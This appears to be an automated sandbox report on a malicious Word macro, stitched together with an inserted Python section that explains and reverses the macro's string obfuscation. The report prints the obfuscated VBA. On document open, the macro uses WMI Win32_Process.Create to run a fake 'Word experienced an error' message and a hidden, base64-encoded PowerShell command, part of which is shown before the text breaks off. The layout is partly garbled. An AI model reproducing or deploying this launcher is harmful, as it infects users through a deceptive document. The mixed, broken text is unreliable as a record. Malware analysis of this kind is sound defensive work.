Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: CreateObject
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Mid
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Len
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Create
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Jib98w2i8chhr
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: N4enanrrzm_ja
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open
Part of subcall function Vj_abq1qp3rat9wz@T1f2hilsywf9dq: Open

Line  Instruction                   Meta Information
9     Private Sub Document_open()
10    Vj_abq1qp3rat9wz              executed
11    End Sub

Module: Pkebr_y5xjd5hl070

Declaration
Line  Content
1     Attribute VB_Name = "Pkebr_y5xjd5hl070"
2     Attribute VB_Base = "0{9D897C48-94D7-48BA-981A-540C527DFECB}{D1114CBA-B9B7-4991-84EB-5C5DD038E3F9}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False

Module: Seby_rq4k8mp

Declaration
Line  Content
1     Attribute VB_Name = "Seby_rq4k8mp"
2     Attribute VB_Base = "0{8C08A6E4-D61D-4DFA-9005-995F3C6B461B}{AB11852B-4BC8-48EF-B786-4176F752DCC1}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = False
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = False

Module: T1f2hilsywf9dq

Declaration
Line  Content
1     Attribute VB_Name = "T1f2hilsywf9dq"

Executed Functions
APIs                                                             Meta Information
Item
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Zgw6mqlr7l2u51
ChrW
Yp8t40c73pqf9j6
wdKeyS
V0ds16izbsl_xm
Eah7s5mir8k6q8
Open
Open
Open
Open
Open
Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open
Open
Open
Open
CreateObject                                                     CreateObject("winmgmtS:win32_process")
Open
Open
Open
Mid
Len

Meta Information (tail of the preceding function's trace; the matching Instruction text is not present in this extract):
Open (x6)
Create
SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD 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,,) -> 0
Part of subcall function Y94cd7j9wr9jms@T1f2hilsywf9dq: Open (x12)
Jib98w2i8chhr
N4enanrrzm_ja
Open (x6)

Decrypted Strings
                                                                                                                        "EMnBm.qhzCjGG.AdplaCwr"
                                                                                                                        "qZLyIGBoG.pxIvxHQJ.ruafsIGOH"
                                                                                                                        "sxxLaTTrF.HCwgq.ncoBz"
                                                                                                                        "qq)(s2)""(pqq)(s2)("
                                                                                                                        "qq)(s2)(roqq"")(s2)(qq)(s2)(ceq""q)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
                                                                                                                        "OstrD.remYG.TgODSiEJw"
                                                                                                                        "zaIoLA.TXEWrApGI.WoizH"
                                                                                                                        "QvCuBxUE.JkVTZJh.XniaV"
                                                                                                                        "qq)(s2)(:wqq)(s2)(qq)(s""2)(inqq)(s2)(3qq)(s2)(2qq"")(s2)(_qq)(s2)("
                                                                                                                        "wLbyGHRF.DHtWiADE.NZhmG"
                                                                                                                        "npKeJB.AsJFFIJ.PEOYbGOz"
                                                                                                                        "Xfyzv.AwqqF.CSulDx"
                                                                                                                        "wqq)(s2)(inqq)(s2)(mqq)(s""2)(gmqq)(s2)(t""qq)(s2)(qq)(s2)("
                                                                                                                        "YPhnJPEH.HagGFmEIC.cyyfEHaR"
                                                                                                                        "UHYrC.GZeVBEo.SOkEIBXGV"
                                                                                                                        "aejsJk.ugJxod.tsCaOC"
                                                                                                                        "lzFAlTr.gioDBGHB.nAGbrAU"
                                                                                                                        "DlhFJNHB.bhBvj.BSVeVFGRY"
                                                                                                                        "kLAOAG.wDTBF.VrHOCGc"
                                                                                                                        "BbJaFjST.Xrzpku.uVfFAHQv"
                                                                                                                        "AigvGEHIB.PPCtCYDWg.gBVHiqCD"
                                                                                                                        "VLWvGECBE.hSxDGF.RmBdHqNjD"
                                                                                                                        "jGlnHJ.WuqlLbxyF.HGhglIF"
                                                                                                                        "DgRkGC.oezuIJ.QreJABJlU"
                                                                                                                        "KjXoEi.VPFBSHI.smiQyd"
                                                                                                                        "GlzLdHXJB.ukgsrF.MzrWIEjI"
                                                                                                                        "iPfhytE.BYjiXI.XRadQ"
                                                                                                                        "MuBaJAqI.JJwbBIG.xcQNDHA"
                                                                                                                        "DGVxCZh.RlEFPCEb.wIwVQJJBo"
                                                                                                                        "XBCgYJ.OzLWBT.wAQnUP"
                                                                                                                        "glqhDDI.CLTNCt.xZeqp"
                                                                                                                        "pDOcllCuD.lEzLut.kKCfGuBND"
                                                                                                                        "ZVPyGDo.KHVpyJEJI.kpQfJeY"
                                                                                                                        "zDQxMR.iplzr.wAjoodIF"
                                                                                                                        "QrkQH.tOWCIP.GrDHUJ"
                                                                                                                        "LQAVC.FldzmI.oCeVXZC"
                                                                                                                        "xbtmGo.qIuZXGHJ.RZptvtQEG"
                                                                                                                        "cRxbPCb.XykXFJGA.LtZggMsGa"
                                                                                                                        "HoPXpGBA.IwHCJMDRA.CmlzH"
                                                                                                                        "OECHJGADF.eWIOVB.CjlHH"
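The four marker-laden literals in the list above (assigned to sng2, E_gr5d7gii7nk, Ozms0qq3sojl and Nogf5r6twyl1 in the macro listing) and the -ENCOD argument in the trace rely on the same trick: a fixed junk marker, qq)(s2)(, is spliced into every string and removed at runtime, so neither the WMI moniker nor the PowerShell command ever appears whole in the document. The following Python is an added example, not code from this report or from the sample. It strips the marker from those four fragments, and shows how the same stripping followed by base64 and UTF-16LE decoding recovers a PowerShell script from an -EncodedCommand blob laid out the way the trace shows it (three base64 characters between markers). The PowerShell script used as input is constructed for the example; the report's own blob is truncated in this extract and is not decoded here. The handling of a blob cut off mid-marker is an assumption about how a truncated capture should be treated, not something the report states.

```python
import base64

# Junk marker the macro splices into its string literals and removes at runtime.
JUNK = "qq)(s2)("

# The four marker-laden literals exactly as the report lists them (VBA "+" joins kept).
FRAGMENTS = {
    "sng2": "qq)(s2)" + "(pqq)(s2)(",
    "E_gr5d7gii7nk": "qq)(s2)(roqq" + ")(s2)(qq)(s2)(ceq" + "q)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)(",
    "Ozms0qq3sojl": "qq)(s2)(:wqq)(s2)(qq)(s" + "2)(inqq)(s2)(3qq)(s2)(2qq" + ")(s2)(_qq)(s2)(",
    "Nogf5r6twyl1": "wqq)(s2)(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(t" + "qq)(s2)(qq)(s2)(",
}


def strip_junk(text: str, junk: str = JUNK) -> str:
    """Remove every whole occurrence of the junk marker.

    The marker cannot overlap itself (it starts with 'q' and ends with '('),
    so one left-to-right replace removes all of them and cannot create new matches.
    """
    return text.replace(junk, "")


def decode_fragments(fragments: dict) -> dict:
    """Apply strip_junk to each literal; this is what the macro's Replace call does."""
    return {name: strip_junk(value) for name, value in fragments.items()}


def _trim_partial_marker(blob: str, junk: str) -> str:
    """Drop a trailing prefix of the marker left by a capture cut off mid-marker.

    Assumption for truncated captures: if the blob does not end with a whole marker,
    the longest marker prefix at its end is debris. If the cut fell right after a
    base64 'q' this also removes that character; the incomplete trailing quartet
    that decode_encoded_command discards would have swallowed it anyway.
    """
    if blob.endswith(junk):
        return blob
    for k in range(len(junk) - 1, 0, -1):
        if blob.endswith(junk[:k]):
            return blob[:-k]
    return blob


def decode_encoded_command(blob: str, junk: str = JUNK) -> str:
    """Recover the script from a marker-laden -EncodedCommand argument.

    powershell -EncodedCommand (abbreviated -ENCOD in the trace) takes base64 of the
    UTF-16LE script text with no BOM. A truncated blob decodes to a prefix of the script.
    """
    b64 = strip_junk(_trim_partial_marker(blob, junk), junk)
    b64 = b64[: len(b64) - len(b64) % 4]  # drop an incomplete trailing base64 quartet
    raw = base64.b64decode(b64)
    if len(raw) % 2:  # a truncated blob may end in the middle of a UTF-16 code unit
        raw = raw[:-1]
    return raw.decode("utf-16-le")


def obfuscate_command(script: str, junk: str = JUNK, chunk: int = 3) -> str:
    """Build a blob laid out like the trace: UTF-16LE -> base64 -> marker after every
    three base64 characters. Used here only to construct offline test input."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "".join(b64[i:i + chunk] + junk for i in range(0, len(b64), chunk))


if __name__ == "__main__":
    for name, value in decode_fragments(FRAGMENTS).items():
        print(f"{name:>14} -> {value!r}")
    # Constructed input, not the sample's payload.
    demo = obfuscate_command("Write-Output 'hello'")
    print(decode_encoded_command(demo))
```

Stripping the marker from the four fragments yields "winmgmt", ":win32_", "p" and "rocess", which is the WMI moniker and class (winmgmts:Win32_Process) behind the SWbemObjectEx.Create call in the trace; the "s" that joins the first two pieces is not among the fragments shown in this excerpt. The same strip_junk pass applied to the -ENCOD argument turns it back into plain base64, which is why the report can flag an encoded PowerShell command line even though the document never stores one.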
Line Instruction                                           Meta Information
60   Function Vj_abq1qp3rat9wz()
61   On Error Resume Next                                  executed
62   sh2v = Ntx3xle2gjt1.StoryRanges.Item(1)               Item
63   Goto suyzGICEH
64   Dim hlWxWgB as String
65   Dim EzJGE as String
66   Open "EMnBm.qhzCjGG.AdplaCwr" For Binary As 173       Open
69   Put # 173, , hlWxWgB
70   Close # 173
70   suyzGICEH:
72   Goto cnPZICJpM
73   Dim WKGKGYA as String
74   Dim TpbnJRCA as String
75   Open "qZLyIGBoG.pxIvxHQJ.ruafsIGOH" For Binary As 171 Open
78   Put # 171, , WKGKGYA
79   Close # 171
79   cnPZICJpM:
81   Goto nXQZvIEA
82   Dim XkQTmpt as String
83   Dim BjSOooFXD as String
84   Open "sxxLaTTrF.HCwgq.ncoBz" For Binary As 86         Open
87   Put # 86, , XkQTmpt
88   Close # 86
88   nXQZvIEA:
90   sng2 = "qq)(s2)" + "(pqq)(s2)("
91   E_gr5d7gii7nk = "qq)(s2)(roqq" + ")(s2)(qq)(s2)(ceq" + "q)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
92   Goto PtHzDC
93   Dim ufcruVvA as String
94   Dim TIucAHET as String
95   Open "OstrD.remYG.TgODSiEJw" For Binary As 130        Open
98   Put # 130, , ufcruVvA
99   Close # 130
99   PtHzDC:
101  Goto hBvQG
102  Dim LokfC as String
103  Dim XaCoFBkF as String
104  Open "zaIoLA.TXEWrApGI.WoizH" For Binary As 239       Open
107  Put # 239, , LokfC
108  Close # 239
108  hBvQG:
110  Goto LSgRM
111  Dim mYHbrH as String
112  Dim zMifH as String
113  Open "QvCuBxUE.JkVTZJh.XniaV" For Binary As 196       Open
116  Put # 196, , mYHbrH
117  Close # 196
117  LSgRM:
119  Ozms0qq3sojl = "qq)(s2)(:wqq)(s2)(qq)(s" + "2)(inqq)(s2)(3qq)(s2)(2qq" + ")(s2)(_qq)(s2)("
120  Goto hswrCJBk
121  Dim cLvjGII as String
122  Dim AnoQaAEA as String
123  Open "wLbyGHRF.DHtWiADE.NZhmG" For Binary As 148      Open
126  Put # 148, , cLvjGII
127  Close # 148
127  hswrCJBk:
129  Goto jcwCemL
130  Dim UfERFpCEB as String
131  Dim PIypJ as String
132  Open "npKeJB.AsJFFIJ.PEOYbGOz" For Binary As 210      Open
135  Put # 210, , UfERFpCEB
136  Close # 210
136  jcwCemL:
138  Goto YeFQHW
139  Dim CLqtBBHEM as String
140  Dim mjcGEp as String
141  Open "Xfyzv.AwqqF.CSulDx" For Binary As 180           Open
144  Put # 180, , CLqtBBHEM
145  Close # 180
145  YeFQHW:
147  Nogf5r6twyl1 = "wqq)(s2)(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(t" + "qq)(s2)(qq)(s2)("
148  Goto GhPWABBAC
149  Dim PJctPBAG as String
150  Dim pAOchCdIA as String
151  Open "YPhnJPEH.HagGFmEIC.cyyfEHaR" For Binary As 238  Open
154  Put # 238, , PJctPBAG
155  Close # 238
155  GhPWABBAC:
157  Goto ZJqvCII

                                                                                                                        158

                                                                                                                        Dim TyAVHBnfu as String

                                                                                                                        159

                                                                                                                        Dim OEcMJ as String

                                                                                                                        160

                                                                                                                        Open "UHYrC.GZeVBEo.SOkEIBXGV" For Binary As 165

                                                                                                                        Open

                                                                                                                        163

                                                                                                                        Put # 165, , TyAVHBnfu

                                                                                                                        164

                                                                                                                        Close # 165

                                                                                                                        164

                                                                                                                        ZJqvCII:

                                                                                                                        166

                                                                                                                        Goto nbTgII

                                                                                                                        167

                                                                                                                        Dim AtpoQEB as String

                                                                                                                        168

                                                                                                                        Dim YEORYFEgD as String

                                                                                                                        169

                                                                                                                        Open "aejsJk.ugJxod.tsCaOC" For Binary As 178

                                                                                                                        Open

                                                                                                                        172

                                                                                                                        Put # 178, , AtpoQEB

                                                                                                                        173

                                                                                                                        Close # 178

                                                                                                                        173

                                                                                                                        nbTgII:

                                                                                                                        175

                                                                                                                        Dha2d6vv7ph7ph_v = Zgw6mqlr7l2u51 + ChrW(Yp8t40c73pqf9j6 + wdKeyS + V0ds16izbsl_xm) + Eah7s5mir8k6q8

                                                                                                                        Zgw6mqlr7l2u51

                                                                                                                        ChrW

                                                                                                                        Yp8t40c73pqf9j6

                                                                                                                        wdKeyS

                                                                                                                        V0ds16izbsl_xm

                                                                                                                        Eah7s5mir8k6q8

                                                                                                                        176

                                                                                                                        Goto pOumBJl

                                                                                                                        177

                                                                                                                        Dim ljRDIw as String

                                                                                                                        178

                                                                                                                        Dim FkZyGrH as String

                                                                                                                        179

                                                                                                                        Open "lzFAlTr.gioDBGHB.nAGbrAU" For Binary As 216

                                                                                                                        Open

                                                                                                                        182

                                                                                                                        Put # 216, , ljRDIw

                                                                                                                        183

                                                                                                                        Close # 216

                                                                                                                        183

                                                                                                                        pOumBJl:

                                                                                                                        185

                                                                                                                        Goto dvGYxIO

                                                                                                                        186

                                                                                                                        Dim qjEXJBwE as String

                                                                                                                        187

                                                                                                                        Dim wylCIDDAH as String

                                                                                                                        188

                                                                                                                        Open "DlhFJNHB.bhBvj.BSVeVFGRY" For Binary As 151

                                                                                                                        Open

                                                                                                                        191

                                                                                                                        Put # 151, , qjEXJBwE

                                                                                                                        192

                                                                                                                        Close # 151

                                                                                                                        192

                                                                                                                        dvGYxIO:

                                                                                                                        194

                                                                                                                        Goto BPUIP

                                                                                                                        195

                                                                                                                        Dim RntxcqJq as String

                                                                                                                        196

                                                                                                                        Dim RaTSTn as String

                                                                                                                        197

                                                                                                                        Open "kLAOAG.wDTBF.VrHOCGc" For Binary As 141

                                                                                                                        Open

                                                                                                                        200

                                                                                                                        Put # 141, , RntxcqJq

                                                                                                                        201

                                                                                                                        Close # 141

                                                                                                                        201

                                                                                                                        BPUIP:

                                                                                                                        203

                                                                                                                        Ji67p3vs93zl9 = Nogf5r6twyl1 + Dha2d6vv7ph7ph_v + Ozms0qq3sojl + sng2 + E_gr5d7gii7nk

                                                                                                                        204

                                                                                                                        Goto VrYJTkgJq

                                                                                                                        205

                                                                                                                        Dim YenAEIAp as String

                                                                                                                        206

                                                                                                                        Dim UeTMXOrGT as String

                                                                                                                        207

                                                                                                                        Open "BbJaFjST.Xrzpku.uVfFAHQv" For Binary As 247

                                                                                                                        Open

                                                                                                                        210

                                                                                                                        Put # 247, , YenAEIAp

                                                                                                                        211

                                                                                                                        Close # 247

                                                                                                                        211

                                                                                                                        VrYJTkgJq:

                                                                                                                        213

                                                                                                                        Goto LtmnvEE

                                                                                                                        214

                                                                                                                        Dim GfmhF as String

                                                                                                                        215

                                                                                                                        Dim qiVZhCBpC as String

                                                                                                                        216

                                                                                                                        Open "AigvGEHIB.PPCtCYDWg.gBVHiqCD" For Binary As 103

                                                                                                                        Open

                                                                                                                        219

                                                                                                                        Put # 103, , GfmhF

                                                                                                                        220

                                                                                                                        Close # 103

                                                                                                                        220

                                                                                                                        LtmnvEE:

                                                                                                                        222

                                                                                                                        Goto IWrPutAPf

                                                                                                                        223

                                                                                                                        Dim BTiPIcSF as String

                                                                                                                        224

                                                                                                                        Dim FFWrACDoa as String

                                                                                                                        225

                                                                                                                        Open "VLWvGECBE.hSxDGF.RmBdHqNjD" For Binary As 196

                                                                                                                        Open

                                                                                                                        228

                                                                                                                        Put # 196, , BTiPIcSF

                                                                                                                        229

                                                                                                                        Close # 196

                                                                                                                        229

                                                                                                                        IWrPutAPf:

                                                                                                                        231

                                                                                                                        M1_71246hql8icmf = Y94cd7j9wr9jms(Ji67p3vs93zl9)

                                                                                                                        232

                                                                                                                        Goto hVZYKBKH

                                                                                                                        233

                                                                                                                        Dim yArxc as String

                                                                                                                        234

                                                                                                                        Dim QHujBIJp as String

                                                                                                                        235

                                                                                                                        Open "jGlnHJ.WuqlLbxyF.HGhglIF" For Binary As 260

                                                                                                                        Open

                                                                                                                        238

                                                                                                                        Put # 260, , yArxc

                                                                                                                        239

                                                                                                                        Close # 260

                                                                                                                        239

                                                                                                                        hVZYKBKH:

                                                                                                                        241

                                                                                                                        Goto PJxhq

                                                                                                                        242

                                                                                                                        Dim HojJPZ as String

                                                                                                                        243

                                                                                                                        Dim NLiHLTcg as String

                                                                                                                        244

                                                                                                                        Open "DgRkGC.oezuIJ.QreJABJlU" For Binary As 126

                                                                                                                        Open

                                                                                                                        247

                                                                                                                        Put # 126, , HojJPZ

                                                                                                                        248

                                                                                                                        Close # 126

                                                                                                                        248

                                                                                                                        PJxhq:

                                                                                                                        250

                                                                                                                        Goto SELjDEG

                                                                                                                        251

                                                                                                                        Dim bqdcZF as String

                                                                                                                        252

                                                                                                                        Dim ZZTnc as String

                                                                                                                        253

                                                                                                                        Open "KjXoEi.VPFBSHI.smiQyd" For Binary As 86

                                                                                                                        Open

                                                                                                                        256

                                                                                                                        Put # 86, , bqdcZF

                                                                                                                        257

                                                                                                                        Close # 86

                                                                                                                        257

                                                                                                                        SELjDEG:

                                                                                                                        259

                                                                                                                        Set Jb9o1wbsdr9 = CreateObject(M1_71246hql8icmf)

                                                                                                                        CreateObject("winmgmtS:win32_process")

                                                                                                                        executed
                                                                                                                        260

                                                                                                                        Goto Rlclp

                                                                                                                        261

                                                                                                                        Dim IEMTiUEj as String

                                                                                                                        262

                                                                                                                        Dim lYrlEWq as String

                                                                                                                        263

                                                                                                                        Open "GlzLdHXJB.ukgsrF.MzrWIEjI" For Binary As 120

                                                                                                                        Open

                                                                                                                        266

                                                                                                                        Put # 120, , IEMTiUEj

                                                                                                                        267

                                                                                                                        Close # 120

                                                                                                                        267

                                                                                                                        Rlclp:

                                                                                                                        269

                                                                                                                        Goto FIMZH

                                                                                                                        270

                                                                                                                        Dim VAZyEDXCR as String

                                                                                                                        271

                                                                                                                        Dim iyQDTCBS as String

                                                                                                                        272

                                                                                                                        Open "iPfhytE.BYjiXI.XRadQ" For Binary As 90

                                                                                                                        Open

                                                                                                                        275

                                                                                                                        Put # 90, , VAZyEDXCR

                                                                                                                        276

                                                                                                                        Close # 90

                                                                                                                        276

FIMZH:
Goto CAkSJ
Dim cHiYNHFqI as String
Dim JrBDIm as String
Open "MuBaJAqI.JJwbBIG.xcQNDHA" For Binary As 101
    Open
Put # 101, , cHiYNHFqI
Close # 101
CAkSJ:
Bzj0r4l7ded = Mid(sh2v, (5), Len(sh2v))
    Mid
                                                                                                                        Len("\x01 qq)(s2)(qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(/qq)(s2)(cqq)(s2)( qq)(s2)(mqq)(s2)(sqq)(s2)(gqq)(s2)( qq)(s2)(%qq)(s2)(uqq)(s2)(sqq)(s2)(eqq)(s2)(rqq)(s2)(nqq)(s2)(aqq)(s2)(mqq)(s2)(eqq)(s2)(%qq)(s2)( qq)(s2)(/qq)(s2)(vqq)(s2)( qq)(s2)(Wqq)(s2)(oqq)(s2)(rqq)(s2)(dqq)(s2)( qq)(s2)(eqq)(s2)(xqq)(s2)(pqq)(s2)(eqq)(s2)(rqq)(s2)(iqq)(s2)(eqq)(s2)(nqq)(s2)(cqq)(s2)(eqq)(s2)(dqq)(s2)( qq)(s2)(aqq)(s2)(nqq)(s2)( qq)(s2)(eqq)(s2)(rqq)(s2)(rqq)(s2)(oqq)(s2)(rqq)(s2)( qq)(s2)(tqq)(s2)(rqq)(s2)(yqq)(s2)(iqq)(s2)(nqq)(s2)(gqq)(s2)( qq)(s2)(tqq)(s2)(oqq)(s2)( qq)(s2)(oqq)(s2)(pqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(tqq)(s2)(hqq)(s2)(eqq)(s2)( qq)(s2)(fqq)(s2)(iqq)(s2)(lqq)(s2)(eqq)(s2)(.qq)(s2)( qq)(s2)(&qq)(s2)( qq)(s2)( qq)(s2)(Pqq)(s2)(Oqq)(s2)(wqq)(s2)(eqq)(s2)(rqq)(s2)(sqq)(s2)(hqq)(s2)(eqq)(s2)(Lqq)(s2)(Lqq)(s2)( qq)(s2)(-qq)(s2)(wqq)(s2)( qq)(s2)(hqq)(s2)(iqq)(s2)(dqq)(s2)(dqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(-qq)(s2)(Eqq)(s2)(Nqq)(s2)(Cqq)(s2)(Oqq)(s2)(Dqq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( 
IAAqq)(s2)(gACqq)(s2)(QAYqq)(s2)(wBWqq)(s2)(AE4qq)(s2)(AZwqq)(s2)(BBAqq)(s2)(FMAqq)(s2)(PQAqq)(s2)(gAFqq)(s2)(sAVqq)(s2)(AB5qq)(s2)(AFAqq)(s2)(AZQqq)(s2)(BdAqq)(s2)(CgAqq)(s2)(IgBqq)(s2)(7ADqq)(s2)(EAfqq)(s2)(QB7qq)(s2)(ADAqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DMAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(IAfqq)(s2)(QAiqq)(s2)(AC0qq)(s2)(ARgqq)(s2)(AgAqq)(s2)(CcAqq)(s2)(WQBqq)(s2)(TAFqq)(s2)(QAZqq)(s2)(QBNqq)(s2)(AC4qq)(s2)(ASQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(TACqq)(s2)(cALqq)(s2)(AAnqq)(s2)(AFIqq)(s2)(AeQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(PACqq)(s2)(4ARqq)(s2)(ABpqq)(s2)(AHIqq)(s2)(ARQqq)(s2)(BDAqq)(s2)(FQAqq)(s2)(bwAqq)(s2)(nACqq)(s2)(kAOqq)(s2)(wAgqq)(s2)(ACAqq)(s2)(AIAqq)(s2)(BzAqq)(s2)(GUAqq)(s2)(dAAqq)(s2)(tAEqq)(s2)(kAVqq)(s2)(ABFqq)(s2)(AE0qq)(s2)(AIAqq)(s2)(AoAqq)(s2)(CIAqq)(s2)(dgBqq)(s2)(hAHqq)(s2)(IAaqq)(s2)(QBhqq)(s2)(AEIqq)(s2)(AbAqq)(s2)(BlAqq)(s2)(CIAqq)(s2)(KwAqq)(s2)(iADqq)(s2)(oAbqq)(s2)(AA2qq)(s2)(AFUqq)(s2)(AIgqq)(s2)(ArAqq)(s2)(CIAqq)(s2)(WQBqq)(s2)(IACqq)(s2)(IAKqq)(s2)(wAiqq)(s2)(AE4qq)(s2)(AIgqq)(s2)(ApAqq)(s2)(CAAqq)(s2)(IAAqq)(s2)(oAFqq)(s2)(sAVqq)(s2)(ABZqq)(s2)(AHAqq)(s2)(AZQqq)(s2)(BdAqq)(s2)(CgAqq)(s2)(IgBqq)(s2)(7ADqq)(s2)(UAfqq)(s2)(QB7qq)(s2)(ADAqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DcAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(QAfqq)(s2)(QB7qq)(s2)(ADgqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DIAqq)(s2)(fQBqq)(s2)(7ADqq)(s2)(MAfqq)(s2)(QB7qq)(s2)(ADYqq)(s2)(AfQqq)(s2)(B7Aqq)(s2)(DEAqq)(s2)(fQAqq)(s2)(iACqq)(s2)(0ARqq)(s2)(gAgqq)(s2)(ACcqq)(s2)(AWQqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(HAGqq)(s2)(UAcqq)(s2)(gAnqq)(s2)(ACwqq)(s2)(AJwqq)(s2)(BFAqq)(s2)(FAAqq)(s2)(bwBqq)(s2)(JACqq)(s2)(cALqq)(s2)(AAnqq)(s2)(AE4qq)(s2)(AdAqq)(s2)(BtAqq)(s2)(CcAqq)(s2)(LAAqq)(s2)(nAFqq)(s2)(QARqq)(s2)(QBNqq)(s2)(AC4qq)(s2)(ATgqq)(s2)(BlAqq)(s2)(HQAqq)(s2)(LgBqq)(s2)(zAGqq)(s2)(UAJqq)(s2)(wAsqq)(s2)(ACcqq)(s2)(Acwqq)(s2)(AnAqq)(s2)(CwAqq)(s2)(JwBqq)(s2)(BAGqq)(s2)(4AQqq)(s2)(QAnqq)(s2)(ACwqq)(s2)(AJwqq)(s2)(BzAqq)(s2)(CcAqq)(s2)(LAAqq)(s2)(nAFqq)(s2)(IAdqq)(s2)(gBJqq)(s2)(AGMqq)(s2)(AJwqq)(s2
